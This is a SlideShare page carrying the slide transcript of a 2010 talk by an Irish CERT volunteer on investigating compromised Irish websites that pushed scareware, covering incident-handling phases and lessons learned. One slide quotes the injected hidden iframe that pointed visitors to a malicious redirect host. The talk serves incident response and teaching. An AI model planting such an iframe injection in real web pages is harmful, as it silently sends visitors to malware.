• Save
Scareware Traversing the World via Ireland
Upcoming SlideShare
Loading in...5
×
 

Scareware Traversing the World via Ireland

on

  • 846 views

As a volunteer handler for IrissCert, I was notified of several Irish websites being compromised and containing malicious code. The presentation covers the investigation and incident handling process ...

As a volunteer handler for IrissCert, I was notified of several Irish websites being compromised and containing malicious code. The presentation covers the investigation and incident handling process followed.

Statistics

Views

Total Views
846
Views on SlideShare
846
Embed Views
0

Actions

Likes
0
Downloads
0
Comments
0

0 Embeds 0

No embeds

Accessibility

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Scareware Traversing the World via Ireland Scareware Traversing the World via Ireland Presentation Transcript

  • Scareware Traversing the World via an Irish Web Exploit Mark Hillick (@markofu) IrissCert Incident HandlerFriday 17 September 2010
  • Presentations 99%Friday 17 September 2010
  • IrelandFriday 17 September 2010
  • Ireland CSIRT/CERT?Friday 17 September 2010
  • EuropeFriday 17 September 2010
  • Introducing IRISS Volunteer handlers Local Security Professionals Weekly handler shifts Not-for-profit organizationFriday 17 September 2010
  • What do we see?Friday 17 September 2010
  • How do users feel? 2/3 have been victims < 10% feel very safe 97% expect to be victims Law Enforcement & Businesses lack resourcesFriday 17 September 2010
  • Why we’re here!Friday 17 September 2010
  • ALERTS IRISS customFriday 17 September 2010
  • ScarewareFriday 17 September 2010
  • $$$$ FBI -> $150 millionFriday 17 September 2010
  • How easy? Very :-(Friday 17 September 2010
  • GrowthFriday 17 September 2010
  • Scareware EvolvingFriday 17 September 2010
  • Remember Zen and the art of incident handling ...Friday 17 September 2010
  • ReactionsFriday 17 September 2010
  • ReactionsFriday 17 September 2010
  • ReactionsFriday 17 September 2010
  • Identification Gather information Analysis DetermineFriday 17 September 2010
  • Identification - Vector Legitimate WebsitesFriday 17 September 2010
  • Identification - WA Not visible iframe injection • <iframe frameborder = 0 height = 2 width = 2 src ="http://jobstopfil.biz/ tds_a/go.php/go.php?id=4" /></body>Friday 17 September 2010
  • Identification - iframeFriday 17 September 2010
  • Identification - WA DNS requests HTTP • Gets • Posts ScriptsFriday 17 September 2010
  • Identification - SWFriday 17 September 2010
  • Identification SWFriday 17 September 2010
  • Identification - SWFriday 17 September 2010
  • Identification - SWFriday 17 September 2010
  • Identification - Analysis Exploited Sites hosted on one server Weak FTP passwords (e.g. Ghost61) Two most popular web site attacks – • Gumblar - PHP Sites • Asprox - SQL InjectionFriday 17 September 2010
  • Containment Verify Stop the Spread • Remove • Notify • Inform Blackhole Source: Profound Whatever - Flickr Creative CommonsFriday 17 September 2010
  • Eradication Remove Improve Vulnerability Analysis RestoreFriday 17 September 2010
  • Eradication - How?Friday 17 September 2010
  • Eradication - Hosting Struggle but...Friday 17 September 2010
  • Recovery Source: Dilbert ©2009, United Feature Syndicate, Inc.Friday 17 September 2010
  • Recovery - Be Sure! Validate, Restore & MonitorFriday 17 September 2010
  • Lessons LearnedFriday 17 September 2010
  • Lessons Learned Things required for an IR plan - • IR Team • Contact List • Regular Reviews • Escalation ProcessFriday 17 September 2010
  • Lessons Learned Awareness Back-up & test the restore ;-) Patch Test website for vulnerabilities & exploits Defence-in-depth Free Local & Online tools for safer browsing& analysisFriday 17 September 2010
  • Lessons Learned “A website must be able to protect itself from a hostile browser and a browser must be able to protect itself from a hostile website” Jeremiah Grossman (Feb. 2010)Friday 17 September 2010
  • Lessons Learned - Prep Fail to Prepare, well you know the rest :)Friday 17 September 2010
  • Scareware Evolution source: http:// www.f-secure.comFriday 17 September 2010
  • What do you use?Friday 17 September 2010
  • go raibh mile maith agat Twitter @markofu @irisscert @hackeire #irisscon Google-Fu “scareware site:sans.org” Unless states, source of images -> Flickr Creative Commons, iStockPhoto or my own!!Friday 17 September 2010
  • Well......Friday 17 September 2010